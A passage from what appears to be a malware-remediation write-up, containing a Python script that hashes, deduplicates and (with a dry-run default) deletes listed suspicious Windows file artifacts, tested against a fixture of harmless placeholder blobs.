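    path = artifact.replace("%CurrentUserName%", user)
    if path[:3].upper() != "C:\\":
        raise ValueError("expected a C:\\-rooted path: " + artifact)
    return os.path.join(root, *path[3:].split("\\"))


def triage(root: str, user: str, artifacts=ARTIFACTS):
    """Return ({artifact: sha256} for present files, [groups of byte-identical artifacts])."""
    found = {}
    for art in artifacts:
        p = expand(art, user, root)
        if os.path.isfile(p):
            with open(p, "rb") as fh:
                found[art] = hashlib.sha256(fh.read()).hexdigest()
    by_digest = defaultdict(list)
    for art, digest in found.items():
        by_digest[digest].append(art)
    duplicates = sorted(sorted(g) for g in by_digest.values() if len(g) > 1)
    return found, duplicates


def remove_artifacts(root: str, user: str, artifacts=ARTIFACTS, dry_run=True):
    """Delete (or, with dry_run, only list) the listed artifacts present under root."""
    removed = []
    for art in artifacts:
        p = expand(art, user, root)
        if os.path.isfile(p):
            if not dry_run:
                os.remove(p)
            removed.append(p)
    return removed


def build_fixture(user="alice") -> str:
    """Constructed test tree, not from the page: two 50-byte copies of one blob
    and one 31-byte file, written to three of the listed paths."""
    root = tempfile.mkdtemp()
    blob50 = b"MZ" + b"\x00" * 48
    blob31 = b"<html>constructed sample</html>"
    samples = (
        (r"C:\Windows\0cm7.dll", blob50),
        (r"C:\Windows\1kmu.exe", blob50),
        (r"C:\Windows\System32\ML4v.txt", blob31),
    )
    for art, data in samples:
        p = expand(art, user, root)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    root = build_fixture()
    found, dups = triage(root, "alice")
    for art, digest in found.items():
        print(digest[:16], art)
    print("byte-identical groups:", dups)
    print("would remove:", remove_artifacts(root, "alice"))
```

Run the dry run first and keep the hashes it prints; they are what you will want to compare against other hosts, since the cache directory names (`25FDO7QC`, `JYNOWECL`) are per-profile and will differ elsewhere.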
